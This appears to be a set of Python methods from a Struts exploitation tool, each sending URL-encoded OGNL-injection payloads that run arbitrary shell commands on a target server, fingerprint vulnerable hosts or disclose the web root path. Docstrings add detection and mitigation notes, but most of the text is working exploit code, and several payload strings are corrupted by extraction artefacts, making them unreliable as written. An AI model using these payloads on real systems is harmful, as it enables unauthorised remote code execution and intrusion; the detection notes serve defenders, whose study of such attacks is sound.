def executecmd(self, command):
    """Send one OGNL-injection request to the target and return the raw response body.

    The expression carried in ``self.param`` reassigns ``#_memberAccess`` to the
    permissive ``DEFAULT_MEMBER_ACCESS`` and, where that assignment is refused, clears
    ``OgnlUtil``'s excluded-package and excluded-class lists before installing it. It
    then wraps ``command`` in a ``java.lang.ProcessBuilder`` (``cmd.exe /c`` when the
    JVM reports a Windows ``os.name``, ``/bin/bash -c`` otherwise), merges stderr into
    stdout and streams the output back through ``IOUtils.toString``.

    ``command`` is spliced between single quotes with no quoting or escaping, so the
    caller controls the surrounding OGNL fragment as well.

    Detection: look for ``#_memberAccess``, ``@ognl.OgnlContext@``,
    ``getExcludedPackageNames().clear()`` and ``java.lang.ProcessBuilder`` inside a
    query-string value; a Struts release that rejects writes to ``#_memberAccess`` and
    keeps its exclusion lists intact neutralises this expression.

    Returns the body re-encoded as UTF-8 bytes, or ``False`` if the request raised.
    The bare ``except`` swallows every exception type (including KeyboardInterrupt),
    so transport failures and a non-vulnerable target are indistinguishable here.

    NOTE(review): the literal below contains ``[email protected]`` substitutions left
    by text extraction; it is not byte-faithful to the original source.
    ``self.url``, ``self.param``, ``session()`` and ``quote()`` are provided by the
    enclosing class/module.
    """
    payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + command + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
    # The whole expression travels URL-encoded as the value of a single query parameter.
    commandurl = "{}/?{}={}".format(self.url, self.param, quote(payload))
    s = session()
    try:
        r = s.get(commandurl, timeout=5)
        resp = r.text.encode("utf-8")
        return resp
    except:
        return False
def executecmd(self, cmd):
    """Send an OGNL expression through the ``method:`` action-name prefix and return the body.

    The prefix (Dynamic Method Invocation) is what gets the value evaluated as OGNL.
    The expression sets ``#_memberAccess`` to ``DEFAULT_MEMBER_ACCESS``, fetches the
    servlet response, runs ``Runtime.exec`` on the ``cmd`` query parameter, reads the
    process output with a ``java.util.Scanner`` (delimiter from ``pp``, fallback text
    from ``ppp``) and prints it into the response writer. The command itself is passed
    as the ``cmd`` parameter rather than embedded in the expression.

    Detection/mitigation: a ``method:`` prefix whose value contains ``#_memberAccess``
    or ``@java.lang.Runtime@`` is the signature; keeping Dynamic Method Invocation
    disabled (``struts.enable.DynamicMethodInvocation`` false) removes the entry point.

    Returns the body as UTF-8 bytes; on any exception reports a connect error via
    ``self.report`` at ``Level.error`` and returns ``False``.

    NOTE(review): the literal below contains ``[email protected]`` substitutions left
    by text extraction; it is not byte-faithful to the original source.
    ``cmd`` is interpolated into the URL unencoded.
    """
    exp = '''{}/memoindex.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.EXP.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd={}'''
    url = exp.format(self.url, cmd)
    s = session()
    try:
        r = s.get(url, timeout=5)
        res = r.text.encode("utf-8")
        return res
    except Exception as e:
        self.report('connect error {}'.format(e), Level.error)
        return False
def executecmd(self, cmd):
    """Send an OGNL expression via the debugging interceptor (``debug=browser``) and return the body.

    The ``object`` parameter is evaluated as OGNL by the debug interceptor, which is
    only wired in when devMode is enabled. The expression swaps in
    ``DEFAULT_MEMBER_ACCESS``, looks the response object up in ``#context`` under the
    class name supplied in ``rpsobj``, and prints the output of ``Runtime.exec`` on the
    ``command`` parameter into its writer.

    Detection/mitigation: ``debug=browser`` combined with ``#_memberAccess`` or
    ``@java.lang.Runtime@`` in the ``object`` value; devMode must be off in production,
    which disables this interceptor entirely.

    Returns the body as UTF-8 bytes, or ``False`` if the request raised. The bare
    ``except`` hides the failure reason. ``cmd`` is interpolated into the URL unencoded.

    NOTE(review): the literal below contains a ``[email protected]`` substitution
    left by text extraction; it is not byte-faithful to the original source.
    """
    cmdexp = "/?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context" \
             "[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lan" \
             "g.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpso" \
             "bj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command={}"
    commandurl = self.url + cmdexp.format(cmd)
    s = session()
    try:
        r = s.get(commandurl, timeout=5)
        resp = r.text.encode("utf-8")
        return resp
    except:
        return False
def executecmd(self, command):
    """Append an OGNL expression that relaxes ``SecurityMemberAccess`` to ``self.url`` and return the body.

    Instead of replacing ``#_memberAccess`` outright, this variant flips its flags one
    by one (``allowPrivateAccess``, ``allowProtectedAccess``,
    ``allowPackageProtectedAccess``, ``allowStaticMethodAccess``) and empties the
    exclusion patterns by aliasing them to ``acceptProperties``, then runs
    ``Runtime.exec`` on ``command`` and returns its stdout via ``IOUtils.toString``.

    ``command`` is formatted between single quotes with no escaping. The expression
    begins with ``(`` and is concatenated straight onto ``self.url``, so the caller is
    expected to point ``self.url`` at the position where the value is evaluated
    (presumably a parameter-name or path context — confirm against the caller).

    Detection: ``#_memberAccess['allow...']=true`` sequences and ``@java.lang.Runtime@``
    in request data; current Struts releases block these property writes.

    Returns the body as UTF-8 bytes, or ``False`` if the request raised (bare ``except``).
    """
    poc = "(%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true," \
          "%23_memberAccess['excludedPackageNamePatterns']=%23_memberAccess['acceptProperties']," \
          "%23_memberAccess['excludedClasses']=%23_memberAccess['acceptProperties'],%23_memberAccess" \
          "['allowPackageProtectedAccess']=true,%23_memberAccess['allowStaticMethodAccess']=true," \
          "@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('{}').getInputStream()))".format(command)
    commandurl = self.url + poc
    s = session()
    try:
        r = s.get(commandurl, timeout=5)
        resp = r.text.encode("utf-8")
        return resp
    except:
        return False
def executecmd(self, cmd):
    """Send an OGNL expression in the request *path* and return the body.

    The expression occupies the first path segment (``/(…)?…:xx.toString.json``), a
    shape that targets code paths which evaluate the action/method name as OGNL. It
    installs ``DEFAULT_MEMBER_ACCESS``, obtains the response writer via
    ``#context[#parameters.obj[0]]``, runs ``Runtime.exec`` on the ``command`` query
    parameter and writes the output back, flushing and closing the writer.

    Detection: ``#_memberAccess`` / ``@java.lang.Runtime@`` URL-encoded inside the path
    rather than the query string; most WAF rules that only inspect parameters miss it.

    Returns the body as UTF-8 bytes, or ``False`` if the request raised (bare ``except``).
    ``cmd`` is interpolated into the URL unencoded.

    NOTE(review): the literal below contains ``[email protected]`` substitutions left
    by text extraction; it is not byte-faithful to the original source.
    """
    cmdexp = "/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parame" \
             "ters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Run" \
             "time@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23" \
             "wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServ" \
             "letResponse&content=16456&command={}"
    commandurl = self.url+cmdexp.format(cmd)
    s = session()
    try:
        r = s.get(commandurl, timeout=5)
        resp = r.text.encode("utf-8")
        return resp
    except:
        return False
def executecmd(self, command):
    """Send an OGNL expression through the ``redirect:`` action prefix and return the body.

    The fully URL-encoded value after ``redirect:`` decodes to ``${…}``, which the
    prefix handler evaluates as OGNL. It sets
    ``xwork.MethodAccessor.denyMethodExecution`` to false in ``#context``, then uses
    reflection (``getDeclaredField('allowStaticMethodAccess')`` + ``setAccessible``)
    to flip that flag on ``#_memberAccess`` before calling ``Runtime.exec`` on
    ``command`` and returning its output via ``IOUtils.toString``.

    ``command`` is formatted between encoded single quotes with no escaping.

    Detection/mitigation: a ``redirect:`` or similar action prefix whose value contains
    ``%24%7B`` (``${``) or ``denyMethodExecution``; Struts releases that no longer
    honour these prefixes are not affected.

    Returns the body as UTF-8 bytes, or ``False`` if the request raised (bare ``except``).

    NOTE(review): the literal below contains ``[email protected]`` substitutions left
    by text extraction; it is not byte-faithful to the original source.
    """
    poc = "/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution" \
          "%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStati" \
          "cMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%2" \
          "9%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%2" \
          "7{}%27%29.getInputStream%28%29%29%7D".format(command)
    commandurl = self.url + poc
    s = session()
    try:
        r = s.get(commandurl, timeout=5)
        resp = r.text.encode("utf-8")
        return resp
    except:
        return False
def ifpoc(self):
    """Probe whether the target evaluates OGNL supplied via the ``method:`` prefix.

    This is a non-destructive fingerprint rather than a command runner: the expression
    installs ``DEFAULT_MEMBER_ACCESS``, then prints ``#parameters.content[0] + 602 +
    53718`` into the response writer. With ``content=10086`` the OGNL ``+`` on a string
    concatenates, so a vulnerable server answers with exactly ``1008660253718``; any
    other body means the expression was not evaluated.

    Detection: the same ``method:%23_memberAccess`` marker as the command variant, with
    a numeric-echo payload instead of ``Runtime.exec``.

    Returns ``True`` only when the body equals the expected echo, ``False`` otherwise;
    on any exception reports a connect error via ``self.report`` at ``Level.error``
    and returns ``False``.

    NOTE(review): the literal below contains a ``[email protected]`` substitution
    left by text extraction; it is not byte-faithful to the original source.
    """
    poc = '''{}/memoindex.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086'''
    url = poc.format(self.url)
    s = session()
    try:
        r = s.get(url, timeout=5)
        resp = r.text.encode("utf-8")
        # Expected echo of "10086" + 602 + 53718 under OGNL string concatenation.
        if resp == '1008660253718':
            return True
        else:
            return False
    except Exception as e:
        self.report('url connect error {}'.format(e), Level.error)
        return False
def getwebpath(self):
    """Ask the target for its web root's real filesystem path via path-segment OGNL.

    The expression installs ``DEFAULT_MEMBER_ACCESS``, grabs the current request from
    ``ServletActionContext``, and prints ``request.getRealPath(#parameters.pp[0])``
    (``pp=/``) into the response writer obtained through ``#context[#parameters.obj[0]]``.
    Information disclosure only — no process is spawned here.

    Detection: ``#_memberAccess`` / ``ServletActionContext`` URL-encoded in the path,
    plus a ``getRealPath`` call; the disclosed path is typically a precursor to
    file-write attempts, so treat a hit as high-signal.

    Return contract is uneven: the body as UTF-8 bytes when the status is 200;
    ``None`` (implicit fall-through) for any other status; ``False`` when the request
    raised. Unlike the sibling methods the ``except`` reports without a ``Level`` and
    the bound exception ``err`` is never used.

    NOTE(review): the literal below contains a ``[email protected]`` substitution
    left by text extraction; it is not byte-faithful to the original source.
    """
    webpath = "/%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts" \
              "2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWri" \
              "ter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23w" \
              "r.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f"
    pathurl = self.url + webpath
    s = session()
    try:
        res = s.get(pathurl, timeout=5)
        if res.status_code == 200:
            filepath = res.text.encode('utf-8')
            return filepath
    except Exception as err:
        self.report("Fail to get web file path {}".format(pathurl))
        return False
def pocurl(self):
    """Probe for path-segment OGNL evaluation by having the server echo a fixed marker.

    The expression installs ``DEFAULT_MEMBER_ACCESS`` and prints
    ``#parameters.content[0]`` — the constant ``25F9E794323B453885F5181F1B624D0B`` —
    into the response writer, then flushes and closes it. Sent as a POST (the sibling
    probes use GET). Non-destructive: nothing is executed on the host.

    A hit requires both the marker in the body and a body shorter than 40 bytes; the
    length cap filters pages that merely reflect the whole request URL (which also
    contains the marker) back in an error page.

    Detection: the 32-hex-character marker together with ``#_memberAccess`` in the path
    is a reliable IDS signature for this probe.

    Returns ``True`` on a hit, ``False`` otherwise; on any exception reports a
    connection failure via ``self.report`` at ``Level.error`` and returns ``False``.

    NOTE(review): the literal below contains a ``[email protected]`` substitution
    left by text extraction; it is not byte-faithful to the original source.
    """
    poc = "/%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23param" \
          "eters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.clos" \
          "e()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323" \
          "B453885F5181F1B624D0B"
    poc_url = self.url + poc
    s = session()
    try:
        res = s.post(poc_url, timeout=4)
        if res.status_code == 200 and "25F9E794323B453885F5181F1B624D0B" in res.content:
            # A genuine echo is the 32-char marker plus line terminator (~34 bytes);
            # anything longer is most likely the request reflected in an error page.
            if len(res.content) < 40:  # 34 length
                return True
            else:
                return False
        else:
            return False
    except Exception as e:
        self.report("Failed to connection {}".format(poc_url), Level.error)
        return False